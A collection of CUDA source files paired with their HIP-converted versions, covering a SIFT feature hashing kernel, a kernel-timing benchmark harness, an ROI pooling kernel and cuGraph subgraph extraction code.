kDimSiftData + j] * d_secondProjMat[m * kDimSiftData + j]; } ptr->deviceHashDataPtrList[index * kDimSiftData + m] = (sumSecondHash > 0 ? 1 : 0); /*if (imageIndex == 0 && (index == 5) && m == 0) printf("second sum = %d\n", sumSecondHash);*/ } //printf("second hash value = %d", ptr->hashDataPtrList[127]); // calculate the CompHash code // compress <kBitInCompHash> Hash code bits within a single <uint64_t> variable for (int dimCompHashIndex = 0; dimCompHashIndex < kDimCompHashData; dimCompHashIndex++) { uint64_t compHashBitVal = 0; int dimHashIndexLBound = dimCompHashIndex * kBitInCompHash; int dimHashIndexUBound = (dimCompHashIndex + 1) * kBitInCompHash; for (int dimHashIndex = dimHashIndexLBound; dimHashIndex < dimHashIndexUBound; dimHashIndex++) { compHashBitVal = (compHashBitVal << 1) + ptr->deviceHashDataPtrList[index * kDimSiftData + dimHashIndex]; // set the corresponding bit to 1/0 } /*if (imageIndex == 0 && index == 0) { printf("hashdata %llu\n", compHashBitVal); }*/ ptr->compHashDataPtrList[index * kDimCompHashData + dimCompHashIndex] = compHashBitVal; //compHashDataPtr[dimCompHashIndex] = compHashBitVal; } // //if(imageIndex == 1 && index == 2414) { // printf("generated hash value %llu ====%llu\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); // //printf("compress 1: %lld, compress2: %lld\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); //} } } void compute_hash_GPU(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat) { cudaStream_t streams[img_cnt]; for (int i = 0; i < img_cnt; i++) { cudaStreamCreate(&streams[i]); } for(int i = 0; i < img_cnt; i++){ //Parallel dim3 block(1024); dim3 grid((host_ptr->cntPoint + block.x - 1) / block.x); //std::cout << "block = " << block.x << " grid = " << grid.x << std::endl; compute_hash_kernel<<<grid, block, 0, streams[i]>>>(device_ptr[i], d_firstProjMat, d_secondProjMat, i); //hello<<<grid, block>>>(device_ptr[i], d_firstProjMat, d_secondProjMat, i); //CUDA_CHECK_ERROR; host_ptr++; } cudaDeviceSynchronize(); } /* __global__ void hamming_distance_kernel(ImageData *imageData1, ImageData *imageData2, HashData *hashData1, HashData *hashData2, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList) { //int index = blockIdx.x * blockDim.x; int index = blockIdx.x; //printf("blockidx.x = %d, blockdim.x = %d\n", blockIdx.x, blockDim.x); int bucket_id; __shared__ uint16_t totalCandidateSiftPoints; __shared__ uint16_t *candidateSiftPointList; __shared__ uint8_t *candidateHammingDistance; if (index < imageData1->cntPoint) { if (threadIdx.x == 0) { totalCandidateSiftPoints = 0; //printf("%d\n", index); //printf("sift count 1: %d, sift count 2: %d \n", imageData1->cntPoint, imageData2->cntPoint); //printf("bucket count: %d, bucket point: %d \n", hashData1->deviceCntSiftPointInBucket[0], hashData2->deviceCntSiftPointInBucket[0]); for (int i = 0; i < kCntBucketGroup; i++) { bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; totalCandidateSiftPoints = totalCandidateSiftPoints + hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; } candidateSiftPointList = new uint16_t[totalCandidateSiftPoints]; candidateHammingDistance = new uint8_t[totalCandidateSiftPoints]; int dataIndex = 0; for (int i = 0; i < kCntBucketGroup; i++) { int countSiftPointsBucket = 0; bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; countSiftPointsBucket = hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; for (int j = 0; j < countSiftPointsBucket; j++) { candidateSiftPointList[dataIndex] = hashData2->deviceBucketList[i * kCntBucketPerGroup + bucket_id][j]; dataIndex++; } } } } __syncthreads(); int64_t firstImageHashA, firstImageHashB, secondImageHashA, secondImageHashB; firstImageHashA = imageData1->compHashDataPtrList[index * kDimCompHashData]; firstImageHashB = imageData1->compHashDataPtrList[index * kDimCompHashData + 1]; for (int i = 0; i < int8_t((totalCandidateSiftPoints + BLOCK_SIZE - 1) / BLOCK_SIZE); i++){ if ((i * BLOCK_SIZE + threadIdx.x) < totalCandidateSiftPoints) { secondImageHashA = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData]; secondImageHashB = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData + 1]; candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x] = __popcll(firstImageHashA ^ secondImageHashA) + __popcll(firstImageHashB ^ secondImageHashB); //if(index == 0){ //printf("hamming distance = %d \n", candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x]); //} } } __syncthreads(); __shared__ uint16_t topKCandidates[kCntCandidateTopMin]; if (index < imageData1->cntPoint) { //if (threadIdx.x == 0 && index == 0) { int candidatesFoundCnt; if(threadIdx.x == 0){ //printf("image no= %d\n", imageData1->cntPoint); //printf("%d, %d\n", index, totalCandidateSiftPoints); thrust::sort_by_key(thrust::seq, candidateHammingDistance, candidateHammingDistance + totalCandidateSiftPoints, candidateSiftPointList); candidatesFoundCnt = 0; uint16_t candidate; bool duplicate; for(int i = 0; i < totalCandidateSiftPoints; i++){ duplicate = false; //printf("Index: %d, The sorted hamming distance:%d\n", i, candidateHammingDistance[i]); //printf("The corresponding point is:%d\n", candidateSiftPointList[i]); candidate = candidateSiftPointList[i]; for(int j = 0; j < candidatesFoundCnt; j++){ if(candidate == topKCandidates[j]) { duplicate = true; } } if(duplicate == true){ continue; } topKCandidates[candidatesFoundCnt] = candidate; candidatesFoundCnt++; if(candidatesFoundCnt == kCntCandidateTopMin) { break; } } //printf("max = %d, \n", max); for(int i = 0; i < candidatesFoundCnt; i++){ //if (index == 100) //printf("index: %d, The candidate is %d\n", index, topKCandidates[i]); deviceCandidateList[index * kCntCandidateTopMin + i] = topKCandidates[i]; } deviceCandidateCntList[index] = candidatesFoundCnt; } } if(threadIdx.x == 0 && index < imageData1->cntPoint){ delete[] candidateSiftPointList; } } void compute_hamming_distance_GPU(ImageData *deviceptr1, ImageData* deviceptr2, HashData *hashData1, HashData *hashData2, int siftCount, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList){ dim3 block(BLOCK_SIZE); dim3 grid(siftCount); hamming_distance_kernel<<<grid, block>>>(deviceptr1, deviceptr2, hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //hamming_distance_kernel<<<grid, block>>>(deviceptr[4], deviceptr[5], hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //cudaDeviceSynchronize(); } */ void compute_hashes_serial(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat){ //Serial //for (int dataIndex = 0; dataIndex < host_ptr->cntPoint; dataIndex++) //{ // // obtain pointers for SIFT feature vector, Hash code and CompHash code // SiftDataPtr siftDataPtr = host_ptr->siftDataPtrList[dataIndex]; // int bucketID = 0; // // determine the bucket index for each bucket group // for (int m = 0; m < kCntBucketGroup; m++) { // bucketID = 0; // for (int j = 0; j < kCntBucketBit; j++) { // float sum = 0.0f; // for (int k = 0; k < kDimSiftData; k++) { // if (i == 0 && dataIndex == 0 && m == 0) { // //std::cout << "proj data inside fun" << firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k] << std::endl; // //printf("sift data = %d, proj data = %f\n", siftDataPtr[k], firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]); // } // if (siftDataPtr[k] != 0) { // sum += siftDataPtr[k] * firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; // } // } // // if (i == 0 && dataIndex == 0 && m == 0) { // printf("sum = %f\n", sum); // } // bucketID = (bucketID << 1) + (sum > 0 ? 1 : 0); // } // if (i == 0 && dataIndex == 0 && m == 0) { // printf("===============index = %d, group index = %d, bucket id = %d, image no = %d\n===================", dataIndex, m, bucketID, i); // } // } //} // } // //typedef struct StructA { // SiftDataPtr *arrval; // int flag; //} StructA; // //__global__ void kernel(StructA *in) { // // for (int i = 0; i < 2; i++) { // //printf("flag val = %d\n", in[i].flag); // //printf("address = %p\n", in[i].arrval); // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // //printf("address = %p\n", &in[i].arrval[j * 5 + k]); // //printf("val = %d\n", in[i].arrval[j * 5 + k]); // printf("val = %d\n", d_arrval[i][j * 5 + k]); // } // } // printf("-------------------------------------------\n"); // } //} // //void call_kernel_test2() //{ // StructA *h_a, *d_a; // // printf("h_a address:%p\n", h_a); // h_a = (StructA*)malloc(2 * sizeof(StructA)); // printf("h_a address:%p\n", h_a); // // for (int i = 0; i < 2; i++) { // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // h_a[i].arrval = (SiftDataPtr*)malloc(3 * sizeof(SiftDataPtr)); // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // for (int j = 0; j < 3; j++) { // h_a[i].arrval[j] = (int*)malloc(5 * sizeof(int)); // } // } // // int counter = 0; // for (int i = 0; i < 2; i++) { // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // counter += 1; // h_a[i].arrval[j][k] = counter; // } // //printf("\n"); // } // h_a[i].flag = counter; // } // // /*for (int i = 0; i < 2; i++) { // for (int j = 0; j < 8; j++) { // for (int k = 0; k < 5; k++) // printf("val = %d\t", h_a[i].arrval[j][k]); // printf("\n"); // } // printf("-------------------------------------------\n"); // }*/ // // // 1. Allocate device array. // // size_t sz = 0; // cudaDeviceGetLimit(&sz, cudaLimitMallocHeapSize); // printf("heap size:%ld\n", sz); // // cudaMalloc(&d_a, sizeof(StructA) * 2); // CUDA_CHECK_ERROR; // cudaMemcpy(d_a, h_a, sizeof(StructA) * 2, cudaMemcpyHostToDevice); // CUDA_CHECK_ERROR; // // int *d_arrval[2]; // // for (int i = 0; i < 2; i++) { // cudaMalloc(&d_arrval[i], 3 * 5 * sizeof(int)); // cudaMemcpy(&d_a[i].arrval, &d_arrval[i], sizeof(int*), cudaMemcpyHostToDevice); // for (int j = 0; j < 3; j++) { // cudaMemcpy(&d_arrval[i][j], h_a[i].arrval[j], 5 * sizeof(int), cudaMemcpyHostToDevice); // } // } // // // 4. Call kernel with host struct as argument // kernel<<<1, 1>>>(d_a); // // // 5. Copy pointer from device to host. // //cudaMemcpy(h_arr, d_arr, sizeof(int)*10, cudaMemcpyDeviceToHost); // // // 6. Point to host pointer in host struct // // (or do something else with it if this is not needed) // //h_a.arr = h_arr; // //} // //class Particle //{ //public: // double *_w; //}; // //__global__ void test(Particle *p) { // // int idx = threadIdx.x + blockDim.x*blockIdx.x; // // if (idx == 2) { // printf("dev_p[2]._w[2] = %f\n", p[idx]._w[2]); // } //} // //void call_kernel_test3() //{ // int nParticles = 100; // Particle *dev_p; // double *w[nParticles]; // cudaMalloc((void**)&dev_p, nParticles * sizeof(Particle)); // CUDA_CHECK_ERROR; // // for (int i = 0; i < nParticles; i++) { // cudaMalloc((void**)&(w[i]), 300 * sizeof(double)); // CUDA_CHECK_ERROR; // cudaMemcpy(&(dev_p[i]._w), &(w[i]), sizeof(double *), cudaMemcpyHostToDevice); // CUDA_CHECK_ERROR; // } // double testval = 32.7; // cudaMemcpy(w[2] + 2, &testval, sizeof(double), cudaMemcpyHostToDevice); // CUDA_CHECK_ERROR; // test << <1, 32 >> >(dev_p); // cudaDeviceSynchronize(); // CUDA_CHECK_ERROR; // printf("Done!\n"); //}
efc02d5569f8a4b70fd226593cc7c95db643de39.hip
// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "ge_inv_sqrt.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const int sd = 1; const int fd = 1; const REAL *a = NULL; hipMalloc(&a, XSIZE*YSIZE); const int offset_a = 1; const int ld_a = 1; REAL *b = NULL; hipMalloc(&b, XSIZE*YSIZE); const int offset_b = 1; const int ld_b = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( ge_inv_sqrt), dim3(gridBlock),dim3(threadBlock), 0, 0, sd,fd,a,offset_a,ld_a,b,offset_b,ld_b); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( ge_inv_sqrt), dim3(gridBlock),dim3(threadBlock), 0, 0, sd,fd,a,offset_a,ld_a,b,offset_b,ld_b); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( ge_inv_sqrt), dim3(gridBlock),dim3(threadBlock), 0, 0, sd,fd,a,offset_a,ld_a,b,offset_b,ld_b); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
efc02d5569f8a4b70fd226593cc7c95db643de39.cu
#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "ge_inv_sqrt.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const int sd = 1; const int fd = 1; const REAL *a = NULL; cudaMalloc(&a, XSIZE*YSIZE); const int offset_a = 1; const int ld_a = 1; REAL *b = NULL; cudaMalloc(&b, XSIZE*YSIZE); const int offset_b = 1; const int ld_b = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); ge_inv_sqrt<<<gridBlock,threadBlock>>>(sd,fd,a,offset_a,ld_a,b,offset_b,ld_b); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { ge_inv_sqrt<<<gridBlock,threadBlock>>>(sd,fd,a,offset_a,ld_a,b,offset_b,ld_b); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { ge_inv_sqrt<<<gridBlock,threadBlock>>>(sd,fd,a,offset_a,ld_a,b,offset_b,ld_b); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
a6fbd22ebfacd5bd1987368cc85dd6c9a5427119.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "roi_pooling_op.hpp" namespace Shadow { namespace Vision { #if defined(USE_ROCM) template <typename T> __global__ void KernelPOIPooling(const T *in_data, int count, const T *roi_data, int in_c, int in_h, int in_w, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { CUDA_KERNEL_LOOP(globalid, count) { int pw = globalid % pooled_w; int ph = (globalid / pooled_w) % pooled_h; int c = (globalid / pooled_w / pooled_h) % in_c; int n = globalid / pooled_w / pooled_h / in_c; roi_data += n * 5; int roi_batch_id = static_cast<int>(roi_data[0]); int roi_start_w = static_cast<int>(round(roi_data[1] * spatial_scale)); int roi_start_h = static_cast<int>(round(roi_data[2] * spatial_scale)); int roi_end_w = static_cast<int>(round(roi_data[3] * spatial_scale)); int roi_end_h = static_cast<int>(round(roi_data[4] * spatial_scale)); int roi_height = max(roi_end_h - roi_start_h + 1, 1); int roi_width = max(roi_end_w - roi_start_w + 1, 1); T bin_size_h = roi_height / static_cast<T>(pooled_h); T bin_size_w = roi_width / static_cast<T>(pooled_w); int hstart = static_cast<int>(floor(ph * bin_size_h)); int wstart = static_cast<int>(floor(pw * bin_size_w)); int hend = static_cast<int>(ceil((ph + 1) * bin_size_h)); int wend = static_cast<int>(ceil((pw + 1) * bin_size_w)); hstart = min(max(hstart + roi_start_h, 0), in_h); hend = min(max(hend + roi_start_h, 0), in_h); wstart = min(max(wstart + roi_start_w, 0), in_w); wend = min(max(wend + roi_start_w, 0), in_w); bool is_empty = (hend <= hstart) || (wend <= wstart); in_data += (roi_batch_id * in_c + c) * in_h * in_w; T max_val = is_empty ? 0 : in_data[hstart * in_w + wstart]; for (int h = hstart; h < hend; ++h) { for (int w = wstart; w < wend; ++w) { max_val = max(max_val, in_data[h * in_w + w]); } } out_data[globalid] = max_val; } } template <typename T> void ROIPooling(const T *in_data, const VecInt &in_shape, const T *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { int in_c = in_shape[1], in_h = in_shape[2], in_w = in_shape[3]; int count = num_rois * in_c * pooled_h * pooled_w; hipLaunchKernelGGL(( KernelPOIPooling<T>), dim3(GetBlocks(count)), dim3(NumThreads), 0, 0, in_data, count, roi_data, in_c, in_h, in_w, pooled_h, pooled_w, spatial_scale, out_data); CUDA_CHECK(hipPeekAtLastError()); } template void ROIPooling(const float *in_data, const VecInt &in_shape, const float *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, float *out_data); #endif } // namespace Vision } // namespace Shadow
a6fbd22ebfacd5bd1987368cc85dd6c9a5427119.cu
#include "roi_pooling_op.hpp" namespace Shadow { namespace Vision { #if defined(USE_CUDA) template <typename T> __global__ void KernelPOIPooling(const T *in_data, int count, const T *roi_data, int in_c, int in_h, int in_w, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { CUDA_KERNEL_LOOP(globalid, count) { int pw = globalid % pooled_w; int ph = (globalid / pooled_w) % pooled_h; int c = (globalid / pooled_w / pooled_h) % in_c; int n = globalid / pooled_w / pooled_h / in_c; roi_data += n * 5; int roi_batch_id = static_cast<int>(roi_data[0]); int roi_start_w = static_cast<int>(round(roi_data[1] * spatial_scale)); int roi_start_h = static_cast<int>(round(roi_data[2] * spatial_scale)); int roi_end_w = static_cast<int>(round(roi_data[3] * spatial_scale)); int roi_end_h = static_cast<int>(round(roi_data[4] * spatial_scale)); int roi_height = max(roi_end_h - roi_start_h + 1, 1); int roi_width = max(roi_end_w - roi_start_w + 1, 1); T bin_size_h = roi_height / static_cast<T>(pooled_h); T bin_size_w = roi_width / static_cast<T>(pooled_w); int hstart = static_cast<int>(floor(ph * bin_size_h)); int wstart = static_cast<int>(floor(pw * bin_size_w)); int hend = static_cast<int>(ceil((ph + 1) * bin_size_h)); int wend = static_cast<int>(ceil((pw + 1) * bin_size_w)); hstart = min(max(hstart + roi_start_h, 0), in_h); hend = min(max(hend + roi_start_h, 0), in_h); wstart = min(max(wstart + roi_start_w, 0), in_w); wend = min(max(wend + roi_start_w, 0), in_w); bool is_empty = (hend <= hstart) || (wend <= wstart); in_data += (roi_batch_id * in_c + c) * in_h * in_w; T max_val = is_empty ? 0 : in_data[hstart * in_w + wstart]; for (int h = hstart; h < hend; ++h) { for (int w = wstart; w < wend; ++w) { max_val = max(max_val, in_data[h * in_w + w]); } } out_data[globalid] = max_val; } } template <typename T> void ROIPooling(const T *in_data, const VecInt &in_shape, const T *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, T *out_data) { int in_c = in_shape[1], in_h = in_shape[2], in_w = in_shape[3]; int count = num_rois * in_c * pooled_h * pooled_w; KernelPOIPooling<T><<<GetBlocks(count), NumThreads>>>( in_data, count, roi_data, in_c, in_h, in_w, pooled_h, pooled_w, spatial_scale, out_data); CUDA_CHECK(cudaPeekAtLastError()); } template void ROIPooling(const float *in_data, const VecInt &in_shape, const float *roi_data, int num_rois, int pooled_h, int pooled_w, float spatial_scale, float *out_data); #endif } // namespace Vision } // namespace Shadow
f330bc560449cbbbafe1a94abea217edc8f389ae.hip
// !!! This is a file automatically generated by hipify!!! /* * Copyright (c) 2020-2021, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cugraph/algorithms.hpp> #include <cugraph/legacy/graph.hpp> #include <cugraph/utilities/error.hpp> #include <raft/device_atomics.cuh> #include <rmm/device_vector.hpp> #include <rmm/exec_policy.hpp> namespace { template <typename vertex_t, typename edge_t, typename weight_t, bool has_weight> std::unique_ptr<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>> extract_subgraph_by_vertices( cugraph::legacy::GraphCOOView<vertex_t, edge_t, weight_t> const& graph, vertex_t const* vertices, vertex_t num_vertices, hipStream_t stream) { edge_t graph_num_verts = graph.number_of_vertices; rmm::device_vector<int64_t> error_count_v{1, 0}; rmm::device_vector<vertex_t> vertex_used_v{graph_num_verts, num_vertices}; vertex_t* d_vertex_used = vertex_used_v.data().get(); int64_t* d_error_count = error_count_v.data().get(); thrust::for_each( rmm::exec_policy(stream), thrust::make_counting_iterator<vertex_t>(0), thrust::make_counting_iterator<vertex_t>(num_vertices), [vertices, d_vertex_used, d_error_count, graph_num_verts] __device__(vertex_t idx) { vertex_t v = vertices[idx]; if ((v >= 0) && (v < graph_num_verts)) { d_vertex_used[v] = idx; } else { atomicAdd(d_error_count, int64_t{1}); } }); CUGRAPH_EXPECTS(error_count_v[0] == 0, "Input error... vertices specifies vertex id out of range"); vertex_t* graph_src = graph.src_indices; vertex_t* graph_dst = graph.dst_indices; weight_t* graph_weight = graph.edge_data; // iterate over the edges and count how many make it into the output int64_t count = thrust::count_if( rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, d_vertex_used, num_vertices] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; return ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)); }); if (count > 0) { auto result = std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( num_vertices, count, has_weight); vertex_t* d_new_src = result->src_indices(); vertex_t* d_new_dst = result->dst_indices(); weight_t* d_new_weight = result->edge_data(); // reusing error_count as a vertex counter... thrust::for_each(rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, graph_weight, d_vertex_used, num_vertices, d_error_count, d_new_src, d_new_dst, d_new_weight] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; if ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)) { // NOTE: Could avoid atomic here by doing a inclusive sum, but that would // require 2*|E| temporary memory. If this becomes important perhaps // we make 2 implementations and pick one based on the number of // vertices in the subgraph set. auto pos = atomicAdd(d_error_count, int64_t{1}); d_new_src[pos] = d_vertex_used[s]; d_new_dst[pos] = d_vertex_used[d]; if (has_weight) d_new_weight[pos] = graph_weight[e]; } }); return result; } else { return std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( 0, 0, has_weight); } } } // namespace namespace cugraph { namespace subgraph { template <typename VT, typename ET, typename WT> std::unique_ptr<legacy::GraphCOO<VT, ET, WT>> extract_subgraph_vertex( legacy::GraphCOOView<VT, ET, WT> const& graph, VT const* vertices, VT num_vertices) { CUGRAPH_EXPECTS(vertices != nullptr, "Invalid input argument: vertices must be non null"); hipStream_t stream{0}; if (graph.edge_data == nullptr) { return extract_subgraph_by_vertices<VT, ET, WT, false>(graph, vertices, num_vertices, stream); } else { return extract_subgraph_by_vertices<VT, ET, WT, true>(graph, vertices, num_vertices, stream); } } template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, float>> extract_subgraph_vertex<int32_t, int32_t, float>( legacy::GraphCOOView<int32_t, int32_t, float> const&, int32_t const*, int32_t); template std::unique_ptr<legacy::GraphCOO<int32_t, int32_t, double>> extract_subgraph_vertex<int32_t, int32_t, double>( legacy::GraphCOOView<int32_t, int32_t, double> const&, int32_t const*, int32_t); } // namespace subgraph } // namespace cugraph
f330bc560449cbbbafe1a94abea217edc8f389ae.cu
/* * Copyright (c) 2020-2021, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cugraph/algorithms.hpp> #include <cugraph/legacy/graph.hpp> #include <cugraph/utilities/error.hpp> #include <raft/device_atomics.cuh> #include <rmm/device_vector.hpp> #include <rmm/exec_policy.hpp> namespace { template <typename vertex_t, typename edge_t, typename weight_t, bool has_weight> std::unique_ptr<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>> extract_subgraph_by_vertices( cugraph::legacy::GraphCOOView<vertex_t, edge_t, weight_t> const& graph, vertex_t const* vertices, vertex_t num_vertices, cudaStream_t stream) { edge_t graph_num_verts = graph.number_of_vertices; rmm::device_vector<int64_t> error_count_v{1, 0}; rmm::device_vector<vertex_t> vertex_used_v{graph_num_verts, num_vertices}; vertex_t* d_vertex_used = vertex_used_v.data().get(); int64_t* d_error_count = error_count_v.data().get(); thrust::for_each( rmm::exec_policy(stream), thrust::make_counting_iterator<vertex_t>(0), thrust::make_counting_iterator<vertex_t>(num_vertices), [vertices, d_vertex_used, d_error_count, graph_num_verts] __device__(vertex_t idx) { vertex_t v = vertices[idx]; if ((v >= 0) && (v < graph_num_verts)) { d_vertex_used[v] = idx; } else { atomicAdd(d_error_count, int64_t{1}); } }); CUGRAPH_EXPECTS(error_count_v[0] == 0, "Input error... vertices specifies vertex id out of range"); vertex_t* graph_src = graph.src_indices; vertex_t* graph_dst = graph.dst_indices; weight_t* graph_weight = graph.edge_data; // iterate over the edges and count how many make it into the output int64_t count = thrust::count_if( rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, d_vertex_used, num_vertices] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; return ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)); }); if (count > 0) { auto result = std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( num_vertices, count, has_weight); vertex_t* d_new_src = result->src_indices(); vertex_t* d_new_dst = result->dst_indices(); weight_t* d_new_weight = result->edge_data(); // reusing error_count as a vertex counter... thrust::for_each(rmm::exec_policy(stream), thrust::make_counting_iterator<edge_t>(0), thrust::make_counting_iterator<edge_t>(graph.number_of_edges), [graph_src, graph_dst, graph_weight, d_vertex_used, num_vertices, d_error_count, d_new_src, d_new_dst, d_new_weight] __device__(edge_t e) { vertex_t s = graph_src[e]; vertex_t d = graph_dst[e]; if ((d_vertex_used[s] < num_vertices) && (d_vertex_used[d] < num_vertices)) { // NOTE: Could avoid atomic here by doing a inclusive sum, but that would // require 2*|E| temporary memory. If this becomes important perhaps // we make 2 implementations and pick one based on the number of // vertices in the subgraph set. auto pos = atomicAdd(d_error_count, int64_t{1}); d_new_src[pos] = d_vertex_used[s]; d_new_dst[pos] = d_vertex_used[d]; if (has_weight) d_new_weight[pos] = graph_weight[e]; } }); return result; } else { return std::make_unique<cugraph::legacy::GraphCOO<vertex_t, edge_t, weight_t>>( 0, 0, has_weight); } } } // namespace namespace cugraph { namespace subgraph { template <typename VT, typename ET, typename WT> std::unique_ptr<legacy::GraphCOO<VT, ET, WT>> extract_subgraph_vertex( legacy::GraphCOOView<VT, ET, WT> const& graph, VT const* vertices, VT num_vertices) { CUGRAPH_EXPECTS(vertices != nullptr, 